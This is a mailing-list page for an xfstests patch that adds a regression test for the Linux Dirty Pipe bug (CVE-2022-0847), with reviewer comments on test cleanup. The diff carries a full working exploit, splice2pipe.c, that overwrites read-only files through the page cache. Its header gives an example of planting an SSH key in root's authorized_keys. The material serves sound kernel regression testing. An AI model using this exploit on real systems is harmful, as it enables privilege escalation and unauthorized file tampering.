diff mbox series

[2/2] fstests: test dirty pipe vulnerability issue of CVE-2022-0847

Message ID 20220321110341.1323882-3-zlang@redhat.com (mailing list archive)
State New, archived
Headers show
Series xfstests: hexdump and CVE-2022-0847 | expand

Commit Message

Zorro Lang March 21, 2022, 11:03 a.m. UTC
Test for the Dirty Pipe vulnerability (CVE-2022-0847) caused by an
uninitialized  "pipe_buffer.flags" variable. The bug cause a file
can be overwritten even if a user/process is not permitted to write
it. It's fixed by 9d2231c5d74e ("lib/iov_iter: initialize "flags" in
new pipe_buffer").

Cc: Max Kellermann <max.kellermann@ionos.com>
Signed-off-by: Zorro Lang <zlang@redhat.com>
---
 .gitignore            |   1 +
 src/Makefile          |   2 +-
 src/splice2pipe.c     | 158 ++++++++++++++++++++++++++++++++++++++++++
 tests/generic/999     |  54 +++++++++++++++
 tests/generic/999.out |   9 +++
 5 files changed, 223 insertions(+), 1 deletion(-)
 create mode 100644 src/splice2pipe.c
 create mode 100755 tests/generic/999
 create mode 100644 tests/generic/999.out

Comments

Dave Chinner March 22, 2022, 5:35 a.m. UTC | #1
On Mon, Mar 21, 2022 at 07:03:41PM +0800, Zorro Lang wrote:
> diff --git a/tests/generic/999 b/tests/generic/999
> new file mode 100755
> index 00000000..2488e455
> --- /dev/null
> +++ b/tests/generic/999
> @@ -0,0 +1,54 @@
> +#! /bin/bash
> +# SPDX-License-Identifier: GPL-2.0
> +# Copyright (c) 2022 Red Hat, Inc.  All Rights Reserved.
> +#
> +# FS QA Test No. 999
> +#
> +# Test for the Dirty Pipe vulnerability (CVE-2022-0847) caused by an
> +# uninitialized  "pipe_buffer.flags" variable, which fixed by:
> +#   9d2231c5d74e ("lib/iov_iter: initialize "flags" in new pipe_buffer")
> +#
> +. ./common/preamble
> +_begin_fstest auto quick
> +
> +_cleanup()
> +{
> +	cd /
> +	rm -f $tmp.*
> +	rm -f $TEST_DIR/testfile.$seq
> +}

Just leave the test file lying around so this can use the default
cleanup method. The test device is supposed to gather random
cruft as tests run....

> +
> +# real QA test starts here
> +_supported_fs generic
> +_require_test
> +_require_user
> +_require_chmod
> +_require_test_program "splice2pipe"
> +
> +localfile=$TEST_DIR/testfile.$seq

.... and remove the file here as part of test setup with:

rm -f $localfile

Otherwise looks fine.

Cheers,

Dave.
Zorro Lang March 22, 2022, 12:30 p.m. UTC | #2
On Tue, Mar 22, 2022 at 04:35:55PM +1100, Dave Chinner wrote:
> On Mon, Mar 21, 2022 at 07:03:41PM +0800, Zorro Lang wrote:
> > diff --git a/tests/generic/999 b/tests/generic/999
> > new file mode 100755
> > index 00000000..2488e455
> > --- /dev/null
> > +++ b/tests/generic/999
> > @@ -0,0 +1,54 @@
> > +#! /bin/bash
> > +# SPDX-License-Identifier: GPL-2.0
> > +# Copyright (c) 2022 Red Hat, Inc.  All Rights Reserved.
> > +#
> > +# FS QA Test No. 999
> > +#
> > +# Test for the Dirty Pipe vulnerability (CVE-2022-0847) caused by an
> > +# uninitialized  "pipe_buffer.flags" variable, which fixed by:
> > +#   9d2231c5d74e ("lib/iov_iter: initialize "flags" in new pipe_buffer")
> > +#
> > +. ./common/preamble
> > +_begin_fstest auto quick
> > +
> > +_cleanup()
> > +{
> > +	cd /
> > +	rm -f $tmp.*
> > +	rm -f $TEST_DIR/testfile.$seq
> > +}
> 
> Just leave the test file lying around so this can use the default
> cleanup method. The test device is supposed to gather random
> cruft as tests run....

Got that, I'll keep this file, and turn to use default _cleanup.

> 
> > +
> > +# real QA test starts here
> > +_supported_fs generic
> > +_require_test
> > +_require_user
> > +_require_chmod
> > +_require_test_program "splice2pipe"
> > +
> > +localfile=$TEST_DIR/testfile.$seq
> 
> .... and remove the file here as part of test setup with:
> 
> rm -f $localfile

Just curious, I've used xfs_io "-t" option to truncate $localfile before testing:
$XFS_IO_PROG -f -t -c "pwrite 0 4k -S 0xff" $localfile

Can that instead of the "rm -f $localfile" ?

(As both patches need to change, I'd like to change the 1st patch's g/404 in next
version patch together, if no objection)

Thanks,
Zorro

> 
> Otherwise looks fine.
> 
> Cheers,
> 
> Dave.
> -- 
> Dave Chinner
> david@fromorbit.com
>
Darrick J. Wong March 22, 2022, 3:52 p.m. UTC | #3
On Tue, Mar 22, 2022 at 08:30:02PM +0800, Zorro Lang wrote:
> On Tue, Mar 22, 2022 at 04:35:55PM +1100, Dave Chinner wrote:
> > On Mon, Mar 21, 2022 at 07:03:41PM +0800, Zorro Lang wrote:
> > > diff --git a/tests/generic/999 b/tests/generic/999
> > > new file mode 100755
> > > index 00000000..2488e455
> > > --- /dev/null
> > > +++ b/tests/generic/999
> > > @@ -0,0 +1,54 @@
> > > +#! /bin/bash
> > > +# SPDX-License-Identifier: GPL-2.0
> > > +# Copyright (c) 2022 Red Hat, Inc.  All Rights Reserved.
> > > +#
> > > +# FS QA Test No. 999
> > > +#
> > > +# Test for the Dirty Pipe vulnerability (CVE-2022-0847) caused by an
> > > +# uninitialized  "pipe_buffer.flags" variable, which fixed by:
> > > +#   9d2231c5d74e ("lib/iov_iter: initialize "flags" in new pipe_buffer")
> > > +#
> > > +. ./common/preamble
> > > +_begin_fstest auto quick
> > > +
> > > +_cleanup()
> > > +{
> > > +	cd /
> > > +	rm -f $tmp.*
> > > +	rm -f $TEST_DIR/testfile.$seq
> > > +}
> > 
> > Just leave the test file lying around so this can use the default
> > cleanup method. The test device is supposed to gather random
> > cruft as tests run....
> 
> Got that, I'll keep this file, and turn to use default _cleanup.
> 
> > 
> > > +
> > > +# real QA test starts here
> > > +_supported_fs generic
> > > +_require_test
> > > +_require_user
> > > +_require_chmod
> > > +_require_test_program "splice2pipe"
> > > +
> > > +localfile=$TEST_DIR/testfile.$seq
> > 
> > .... and remove the file here as part of test setup with:
> > 
> > rm -f $localfile
> 
> Just curious, I've used xfs_io "-t" option to truncate $localfile before testing:
> $XFS_IO_PROG -f -t -c "pwrite 0 4k -S 0xff" $localfile
> 
> Can that instead of the "rm -f $localfile" ?

Open-and-truncate isn't safe here because some other (buggy) test might
run 'mkfifo $TEST_DIR/testfile.XXX' and now opening the pipe will hang
fstests.  It's ok for the scratch fs because you have to mkfs it, but as
Dave said, the test fs slowly accumulates cruft over time.

--D

> (As both patches need to change, I'd like to change the 1st patch's g/404 in next
> version patch together, if no objection)
> 
> Thanks,
> Zorro
> 
> > 
> > Otherwise looks fine.
> > 
> > Cheers,
> > 
> > Dave.
> > -- 
> > Dave Chinner
> > david@fromorbit.com
> > 
>
Zorro Lang March 22, 2022, 5:13 p.m. UTC | #4
On Tue, Mar 22, 2022 at 08:52:44AM -0700, Darrick J. Wong wrote:
> On Tue, Mar 22, 2022 at 08:30:02PM +0800, Zorro Lang wrote:
> > On Tue, Mar 22, 2022 at 04:35:55PM +1100, Dave Chinner wrote:
> > > On Mon, Mar 21, 2022 at 07:03:41PM +0800, Zorro Lang wrote:
> > > > diff --git a/tests/generic/999 b/tests/generic/999
> > > > new file mode 100755
> > > > index 00000000..2488e455
> > > > --- /dev/null
> > > > +++ b/tests/generic/999
> > > > @@ -0,0 +1,54 @@
> > > > +#! /bin/bash
> > > > +# SPDX-License-Identifier: GPL-2.0
> > > > +# Copyright (c) 2022 Red Hat, Inc.  All Rights Reserved.
> > > > +#
> > > > +# FS QA Test No. 999
> > > > +#
> > > > +# Test for the Dirty Pipe vulnerability (CVE-2022-0847) caused by an
> > > > +# uninitialized  "pipe_buffer.flags" variable, which fixed by:
> > > > +#   9d2231c5d74e ("lib/iov_iter: initialize "flags" in new pipe_buffer")
> > > > +#
> > > > +. ./common/preamble
> > > > +_begin_fstest auto quick
> > > > +
> > > > +_cleanup()
> > > > +{
> > > > +	cd /
> > > > +	rm -f $tmp.*
> > > > +	rm -f $TEST_DIR/testfile.$seq
> > > > +}
> > > 
> > > Just leave the test file lying around so this can use the default
> > > cleanup method. The test device is supposed to gather random
> > > cruft as tests run....
> > 
> > Got that, I'll keep this file, and turn to use default _cleanup.
> > 
> > > 
> > > > +
> > > > +# real QA test starts here
> > > > +_supported_fs generic
> > > > +_require_test
> > > > +_require_user
> > > > +_require_chmod
> > > > +_require_test_program "splice2pipe"
> > > > +
> > > > +localfile=$TEST_DIR/testfile.$seq
> > > 
> > > .... and remove the file here as part of test setup with:
> > > 
> > > rm -f $localfile
> > 
> > Just curious, I've used xfs_io "-t" option to truncate $localfile before testing:
> > $XFS_IO_PROG -f -t -c "pwrite 0 4k -S 0xff" $localfile
> > 
> > Can that instead of the "rm -f $localfile" ?
> 
> Open-and-truncate isn't safe here because some other (buggy) test might
> run 'mkfifo $TEST_DIR/testfile.XXX' and now opening the pipe will hang
> fstests.  It's ok for the scratch fs because you have to mkfs it, but as
> Dave said, the test fs slowly accumulates cruft over time.

Make sense, Thanks! I'll change that.

Thanks,
Zorro

> 
> --D
> 
> > (As both patches need to change, I'd like to change the 1st patch's g/404 in next
> > version patch together, if no objection)
> > 
> > Thanks,
> > Zorro
> > 
> > > 
> > > Otherwise looks fine.
> > > 
> > > Cheers,
> > > 
> > > Dave.
> > > -- 
> > > Dave Chinner
> > > david@fromorbit.com
> > > 
> > 
>
diff mbox series

Patch

diff --git a/.gitignore b/.gitignore
index ca6ba5c4..cd80d3a2 100644
--- a/.gitignore
+++ b/.gitignore
@@ -125,6 +125,7 @@  tags
 /src/runas
 /src/seek_copy_test
 /src/seek_sanity_test
+/src/splice2pipe
 /src/splice-test
 /src/stale_handle
 /src/stat_test
diff --git a/src/Makefile b/src/Makefile
index 4d9e02b7..16aad922 100644
--- a/src/Makefile
+++ b/src/Makefile
@@ -31,7 +31,7 @@  LINUX_TARGETS = xfsctl bstat t_mtab getdevicesize preallo_rw_pattern_reader \
 	dio-invalidate-cache stat_test t_encrypted_d_revalidate \
 	attr_replace_test swapon mkswap t_attr_corruption t_open_tmpfiles \
 	fscrypt-crypt-util bulkstat_null_ocount splice-test chprojid_fail \
-	detached_mounts_propagation ext4_resize t_readdir_3
+	detached_mounts_propagation ext4_resize t_readdir_3 splice2pipe
 
 EXTRA_EXECS = dmerror fill2attr fill2fs fill2fs_check scaleread.sh \
 	      btrfs_crc32c_forged_name.py
diff --git a/src/splice2pipe.c b/src/splice2pipe.c
new file mode 100644
index 00000000..bd33ff67
--- /dev/null
+++ b/src/splice2pipe.c
@@ -0,0 +1,158 @@ 
+/* SPDX-License-Identifier: GPL-2.0 */
+/*
+ * Copyright 2022 CM4all GmbH / IONOS SE
+ *
+ * author: Max Kellermann <max.kellermann@ionos.com>
+ *
+ * Proof-of-concept exploit for the Dirty Pipe
+ * vulnerability (CVE-2022-0847) caused by an uninitialized
+ * "pipe_buffer.flags" variable.  It demonstrates how to overwrite any
+ * file contents in the page cache, even if the file is not permitted
+ * to be written, immutable or on a read-only mount.
+ *
+ * This exploit requires Linux 5.8 or later; the code path was made
+ * reachable by commit f6dd975583bd ("pipe: merge
+ * anon_pipe_buf*_ops").  The commit did not introduce the bug, it was
+ * there before, it just provided an easy way to exploit it.
+ *
+ * There are two major limitations of this exploit: the offset cannot
+ * be on a page boundary (it needs to write one byte before the offset
+ * to add a reference to this page to the pipe), and the write cannot
+ * cross a page boundary.
+ *
+ * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n'
+ *
+ * Further explanation: https://dirtypipe.cm4all.com/
+ */
+#ifndef _GNU_SOURCE
+#define _GNU_SOURCE
+#endif
+#include <unistd.h>
+#include <fcntl.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/user.h>
+
+/**
+ * Create a pipe where all "bufs" on the pipe_inode_info ring have the
+ * PIPE_BUF_FLAG_CAN_MERGE flag set.
+ */
+static void prepare_pipe(int p[2])
+{
+	if (pipe(p)) {
+		perror("pipe failed");
+		abort();
+        }
+
+	const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
+	static char buffer[4096];
+
+	/* fill the pipe completely; each pipe_buffer will now have
+	   the PIPE_BUF_FLAG_CAN_MERGE flag */
+	for (unsigned r = pipe_size; r > 0;) {
+		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
+		write(p[1], buffer, n);
+		r -= n;
+	}
+
+	/* drain the pipe, freeing all pipe_buffer instances (but
+	   leaving the flags initialized) */
+	for (unsigned r = pipe_size; r > 0;) {
+		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
+		read(p[0], buffer, n);
+		r -= n;
+	}
+
+	/* the pipe is now empty, and if somebody adds a new
+	   pipe_buffer without initializing its "flags", the buffer
+	   will be mergeable */
+}
+
+int main(int argc, char **argv)
+{
+	if (argc != 4) {
+		fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);
+		return EXIT_FAILURE;
+	}
+
+	/* dumb command-line argument parser */
+	const char *const path = argv[1];
+	loff_t offset = strtoul(argv[2], NULL, 0);
+	const char *const data = argv[3];
+	const size_t data_size = strlen(data);
+	int page_size = sysconf(_SC_PAGESIZE);
+	if (page_size == -1)
+		page_size = 4096;
+
+	if (offset % page_size == 0) {
+		fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
+		return EXIT_FAILURE;
+	}
+
+	const loff_t next_page = (offset | (page_size - 1)) + 1;
+	const loff_t end_offset = offset + (loff_t)data_size;
+	if (end_offset > next_page) {
+		fprintf(stderr, "Sorry, cannot write across a page boundary\n");
+		return EXIT_FAILURE;
+	}
+
+	/* open the input file and validate the specified offset */
+	const int fd = open(path, O_RDONLY); // yes, read-only! :-)
+	if (fd < 0) {
+		perror("open failed");
+		return EXIT_FAILURE;
+	}
+
+	struct stat st;
+	if (fstat(fd, &st)) {
+		perror("stat failed");
+		return EXIT_FAILURE;
+	}
+
+	if (offset > st.st_size) {
+		fprintf(stderr, "Offset is not inside the file\n");
+		return EXIT_FAILURE;
+	}
+
+	if (end_offset > st.st_size) {
+		fprintf(stderr, "Sorry, cannot enlarge the file\n");
+		return EXIT_FAILURE;
+	}
+
+	/* create the pipe with all flags initialized with
+	   PIPE_BUF_FLAG_CAN_MERGE */
+	int p[2];
+	prepare_pipe(p);
+
+	/* splice one byte from before the specified offset into the
+	   pipe; this will add a reference to the page cache, but
+	   since copy_page_to_iter_pipe() does not initialize the
+	   "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
+	--offset;
+	ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
+	if (nbytes < 0) {
+		perror("splice failed");
+		return EXIT_FAILURE;
+	}
+	if (nbytes == 0) {
+		fprintf(stderr, "short splice\n");
+		return EXIT_FAILURE;
+	}
+
+	/* the following write will not create a new pipe_buffer, but
+	   will instead write into the page cache, because of the
+	   PIPE_BUF_FLAG_CAN_MERGE flag */
+	nbytes = write(p[1], data, data_size);
+	if (nbytes < 0) {
+		perror("write failed");
+		return EXIT_FAILURE;
+	}
+	if ((size_t)nbytes < data_size) {
+		fprintf(stderr, "short write\n");
+		return EXIT_FAILURE;
+	}
+
+	return EXIT_SUCCESS;
+}
diff --git a/tests/generic/999 b/tests/generic/999
new file mode 100755
index 00000000..2488e455
--- /dev/null
+++ b/tests/generic/999
@@ -0,0 +1,54 @@ 
+#! /bin/bash
+# SPDX-License-Identifier: GPL-2.0
+# Copyright (c) 2022 Red Hat, Inc.  All Rights Reserved.
+#
+# FS QA Test No. 999
+#
+# Test for the Dirty Pipe vulnerability (CVE-2022-0847) caused by an
+# uninitialized  "pipe_buffer.flags" variable, which fixed by:
+#   9d2231c5d74e ("lib/iov_iter: initialize "flags" in new pipe_buffer")
+#
+. ./common/preamble
+_begin_fstest auto quick
+
+_cleanup()
+{
+	cd /
+	rm -f $tmp.*
+	rm -f $TEST_DIR/testfile.$seq
+}
+
+# real QA test starts here
+_supported_fs generic
+_require_test
+_require_user
+_require_chmod
+_require_test_program "splice2pipe"
+
+localfile=$TEST_DIR/testfile.$seq
+
+# Create a file with 4k 0xff data, then make sure unprivileged user has readonly
+# permission on it
+$XFS_IO_PROG -f -t -c "pwrite 0 4k -S 0xff" $localfile >> $seqres.full 2>&1
+chmod 0644 $localfile
+# Test privileged user (xfstests generally run with root)
+echo "Test privileged user:"
+$here/src/splice2pipe $localfile 1 "AAAAAAAABBBBBBBB"
+# Part of 0xff will be overwritten if there's CVE-2022-0847 bug
+_hexdump $localfile
+
+# Create a file with 4k 0xff data, then make sure unprivileged user has readonly
+# permission on it
+$XFS_IO_PROG -f -t -c "pwrite 0 4k -S 0xff" $localfile >> $seqres.full 2>&1
+chmod 0644 $localfile
+# Copy splice2pipe to a place which can be run by an unprivileged user (avoid
+# something likes /root/xfstests/src/splice2pipe)
+cp $here/src/splice2pipe $tmp.splice2pipe
+# Test unprivileged user's privilege escalation
+echo "Test unprivileged user:"
+su ${qa_user} -c "$tmp.splice2pipe $localfile 1 AAAAAAAABBBBBBBB"
+_hexdump $localfile
+
+# success, all done
+status=0
+exit
diff --git a/tests/generic/999.out b/tests/generic/999.out
new file mode 100644
index 00000000..a142909b
--- /dev/null
+++ b/tests/generic/999.out
@@ -0,0 +1,9 @@ 
+QA output created by 999
+Test privileged user:
+000000 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  >................<
+*
+001000
+Test unprivileged user:
+000000 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  >................<
+*
+001000